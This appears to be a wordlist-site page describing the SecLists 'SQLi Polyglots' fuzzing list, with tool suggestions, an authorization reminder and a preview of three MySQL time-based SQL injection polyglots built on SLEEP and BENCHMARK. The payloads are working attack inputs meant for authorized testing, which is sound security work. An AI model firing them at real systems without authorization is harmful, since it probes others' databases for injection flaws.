Skip to content
Fuzzing354 B

SQLi Polyglots (SecLists)

Compact SQL injection polyglot payloads that trigger in multiple contexts (single/double quote, time-based) across MySQL with a single string.

View source
Size
354 B
Category
Fuzzing
Source
danielmiessler/SecLists
License
MIT
Recommended tools
sqlmapburpwfuzz

Preview

First 3 entries. Download or copy the full list (354 B) using the buttons above.

>head sqli-polyglots-seclists.txt354 B
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/

Compact SQL injection polyglot payloads that trigger in multiple contexts (single/double quote, time-based) across MySQL with a single string.

This list is geared toward input fuzzing and vulnerability discovery. It contains roughly 354 B and pairs well with tools such as sqlmap, burp, wfuzz. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.

You can copy the sample preview straight from this page, copy the entire list to your clipboard, or download the raw .txt file. The full list is served directly from its upstream source on GitHub.

Sourced from danielmiessler/SecLists and distributed under MIT. Only use wordlists against systems you are explicitly authorized to test.